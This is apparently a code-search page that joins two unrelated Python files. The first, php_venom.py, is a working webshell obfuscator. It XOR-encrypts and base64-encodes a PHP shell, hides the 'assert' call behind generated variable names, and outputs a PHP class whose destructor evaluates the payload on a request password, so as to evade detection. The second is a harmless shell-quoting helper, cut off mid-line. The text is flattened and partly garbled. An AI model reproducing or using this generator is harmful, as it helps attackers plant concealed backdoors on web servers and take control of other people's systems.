php_venom.py
Source:php_venom.py
1import random2import base643import argparse4func = 'assert'5shell_tpl = '''<?php 6class {0}{2}7${1}=new {0}();8@${1}->ccc=xor_enc(base64_decode('ddd'), $_REQUEST['strpwd']);9'''10php_xor_func = '''11function xor_enc($str,$key)12{13 $crytxt = '';14 $keylen = strlen($key);15 for($i=0;$i<strlen($str);$i++)16 { 17 $k = $i%$keylen;18 $crytxt .= $str[$i] ^ $key[$k];19 }20 return $crytxt;21}22?>23'''24def xor_enc(text, password):25 pwdLen = len(password)26 textLen = len(text)27 key = textLen // pwdLen*password+password[:textLen % pwdLen]28 enc_list = []29 for i in range(len(key)):30 textBytes = bytes(key, "utf8")[i] ^ bytes(text, "utf8")[i]31 enc_list.append(bytes(chr(textBytes), encoding='utf8'))32 enc_data = b''.join(enc_list)33 return enc_data34def encrypt_shell(raw_shell, password):35 tag_start = raw_shell.find('<?php') + 536 tag_end = raw_shell.rfind('?>', raw_shell.rfind(';'))37 raw_shell = raw_shell[tag_start:tag_end] if tag_end != -1 else raw_shell[tag_start:]38 raw_shell = raw_shell.replace('\\', '\\\\').replace('\'', '\\\'')39 taoke = "eval('{}')".format(raw_shell)40 return base64.b64encode(xor_enc(taoke, password)).decode('utf8')41def random_keys(len):42 str = '`~-=!@#$%^&*_/+?<>{}|:[]abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'43 return ''.join(random.sample(str, len))44def random_name(len):45 str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'46 return ''.join(random.sample(str, len))47def xor(c1, c2):48 return hex(ord(c1) ^ ord(c2)).replace('0x', r"\x")49def build_func():50 func_line = ''51 name_tmp = []52 for i in range(len(func)):53 name_tmp.append(random_name(3).lower())54 key = random_keys(len(func))55 fina = random_name(4)56 call = '${0}='.format(fina)57 for i in range(0, len(func)):58 enc = xor(func[i], key[i])59 func_line += "${0}='{1}'^\"{2}\";".format(name_tmp[i], key[i], enc)60 func_line += '\n'61 call += '${0}.'.format(name_tmp[i])62 func_line = func_line.rstrip('\n')63 # print(func_line)64 call = call.rstrip('.') + ';'65 func_tmpl = '''{ 66function 
__destruct(){67%s68%s69return @$%s("$this->ccc");}}''' % (func_line, call, fina)70 return func_tmpl71def build_webshell(raw_shell, password):72 className = random_name(4)73 objName = className.lower()74 func = build_func()75 shellc = shell_tpl.format(className, objName, func).replace(76 'ccc', random_name(2))77 shellc = shellc.replace('ddd', encrypt_shell(raw_shell, password))78 shellc += php_xor_func79 return shellc80if __name__ == '__main__':81 help_msg = '''82Usage: python3 php_venom.py -f shell.php -o bypass_shell.php -p mypass83Connect: http://xxx.com/bypass_shell.php?strpwd=mypass84 '''85 parser = argparse.ArgumentParser(description='å
æä¸å
å«å
èHTMLçphpèæ¬ï¼ä»
对php7.1以ä¸çæ¬ææï¼ä¸å
å«7.1çæ¬ï¼' +86 help_msg, formatter_class=argparse.RawDescriptionHelpFormatter)87 parser.add_argument('-f', '--file', help='php file needs to bypass.')88 parser.add_argument('-o', '--outfile', help='output file.')89 parser.add_argument('-p', '--password',90 help='password for encrypting shell')91 args = parser.parse_args()92 import sys93 if len(sys.argv) < 2:94 # print(help_msg)95 parser.print_help()96 sys.exit(1)97 with open(args.file, 'r', encoding='utf8') as f:98 raw_shell = f.read()99 with open(args.outfile, 'w', encoding='utf8') as f:...
shell_quoting.py
Source:shell_quoting.py
...
    '''
    Wrap a string with this to make it transparent to shell_quote(). It
    will almost always suffice to use ShellQuoted.format(), path_join(),
    or shell_join().
    If you really must, use raw_shell() to access the raw string.

    The wrapped text is kept in the `do_not_use_raw_str` attribute.  A
    ShellQuoted value is treated by the helpers below as already safe to
    place on a command line, so only wrap text that is either a trusted
    literal or the output of shell_quote().
    '''
    # NOTE(review): the class header is outside this excerpt; __new__ below
    # hands a single value to the base class, which presumably stores it as
    # `do_not_use_raw_str` -- confirm against the full file.

    def __new__(cls, s):
        'No need to nest ShellQuoted: wrapping one reuses its raw string.'
        return super(ShellQuoted, cls).__new__(
            cls, s.do_not_use_raw_str if isinstance(s, ShellQuoted) else s
        )

    def __str__(self):
        # Always raises, so a ShellQuoted cannot be turned into a plain
        # string through str(); the message points at the supported ways
        # of combining values.
        raise RuntimeError(
            'One does not simply convert {0} to a string -- use path_join() '
            'or ShellQuoted.format() instead'.format(repr(self))
        )

    def __repr__(self):
        # Debug representation: class name plus the repr of the raw string.
        return '{0}({1})'.format(
            self.__class__.__name__, repr(self.do_not_use_raw_str)
        )

    def format(self, **kwargs):
        '''
        Use instead of str.format() when the arguments are either
        `ShellQuoted()` or raw strings needing to be `shell_quote()`d.
        Positional args are deliberately not supported since they are more
        error-prone.

        Only the keyword values go through shell_quote(); the template held
        by this object is substituted into as-is, so the template itself
        has to come from trusted code rather than from external input.
        '''
        return ShellQuoted(self.do_not_use_raw_str.format(**dict(
            (k, shell_quote(v).do_not_use_raw_str) for k, v in kwargs.items()
        )))


def shell_quote(s):
    '''
    Quotes a string if it is not already quoted.

    A ShellQuoted argument is returned unchanged; anything else is passed
    through str(), escaped, and wrapped in single quotes.
    '''
    # Single-quote escaping: every quote character in the input closes the
    # quoted run, adds a backslash-escaped quote, and reopens the quoting.
    # NOTE(review): str(s) is applied to any non-ShellQuoted value, so under
    # Python 3 a bytes argument would be quoted as its repr -- confirm that
    # callers only pass text.
    return s if isinstance(s, ShellQuoted) \
        else ShellQuoted("'" + str(s).replace("'", "'\\''") + "'")


def raw_shell(s):
    '''
    Return the raw string held by a ShellQuoted.

    Not a member of ShellQuoted so we get a useful error for raw strings:
    any argument that is not a ShellQuoted raises RuntimeError instead of
    being passed through unquoted.
    '''
    if isinstance(s, ShellQuoted):
        return s.do_not_use_raw_str
    raise RuntimeError('{0} should have been ShellQuoted'.format(s))


def shell_join(delim, it):
    '''
    Joins an iterable of ShellQuoted with a delimiter between each two.

    Each element goes through raw_shell(), so a plain string in `it` raises
    RuntimeError.  `delim` is inserted as given, without quoting.
    '''
    return ShellQuoted(delim.join(raw_shell(s) for s in it))


def path_join(*args):
    'Joins ShellQuoted and raw pieces of paths to make a shell-quoted path'
    # Each piece is normalised with shell_quote() first, so raw strings are
    # quoted one by one and os.path.join() then works on the quoted pieces.
    return ShellQuoted(os.path.join(*[
        raw_shell(shell_quote(s)) for s in args
    ]))


def shell_comment(c):
    'Do not shell-escape raw strings in comments, but do handle line breaks.'
    # A ShellQuoted argument is unwrapped with raw_shell(); a raw string is
    # used as-is.  Every newline is followed by a fresh comment marker so
    # that multi-line text stays inside the comment.
    # NOTE(review): the listing is cut off after the newline replacement;
    # the remainder of this expression is not shown on the page.
    return ShellQuoted('# {c}').format(c=ShellQuoted(
        (raw_shell(c) if isinstance(c, ShellQuoted) else c)
        .replace('\n', '\n# ')...